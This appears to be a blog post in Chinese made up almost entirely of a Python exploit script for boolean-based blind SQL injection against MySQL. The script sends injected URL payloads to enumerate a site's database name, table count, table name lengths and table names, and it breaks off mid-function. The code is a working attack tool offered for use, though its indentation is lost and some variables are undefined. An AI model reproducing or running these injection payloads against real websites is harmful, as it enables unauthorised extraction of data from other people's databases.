import requests
import re
#作者:wf
#当前网站的数据库长度
def database_len():
for i in range(30):
database_len_url=f"{main_url}' and length(database())={i}--+"
print(database_len_url)
html=requests.get(database_len_url).text
if(re.findall(zz,html)):
return i
break
#当前网站的数据库名
def database(database_len):
data=''
database_len=database_len+1
for i in range(1,int(database_len)):
for key in fuzz:
payload_database=f"{main_url}' and substr((select database()),{i},1)='{key}'--+"
print(payload_database)
html=requests.get(payload_database).text
if(re.findall(zz,html)):
#print(key)
data=data+key
return data
#当前网站的表名的数量
def table_num():
for i in range(100):
table_num_url=f"{main_url}' and (select count(table_name) from information_schema.tables where table_schema='{database}')='{i}'--+"
print(table_num_url)
html=requests.get(table_num_url).text
if(re.findall(zz,html)):
return i
break
#当前网站的每个表名的长度
def table_len_num():
z=0
len=[]
for i in range(table_num):
for j in range(100):
table_len_url=f"{main_url}' and length(substr((select table_name from information_schema.tables where table_schema='{database}' limit {i},1),1))={j}--+"
print(table_len_url)
html=requests.get(table_len_url).text
if(re.findall(zz,html)):
len.append([z,j])
z+=1
break
return len
#当前数据库的所有表名称
def table():
tablelist=[]
for i in table_len_num: #表长度
table=''
bool2=False
while 1:
bool1=False
for j in range(1,i[1]+1): #i[0] 1 2 3 4 i[1] 6 8 7 5
for key in fuzz:
payload_table=f"{main_url}' and substr((select table_name from information_schema.tables where table_schema='{database}' limit {i[0]},1),{j},1)='{key}'--+ "
print(payload_table)
html=requests.get(payload_table).text
if(re.findall(zz,html)):
mysql布尔盲注exp直接爆数据
最新推荐文章于 2023-09-21 12:46:39 发布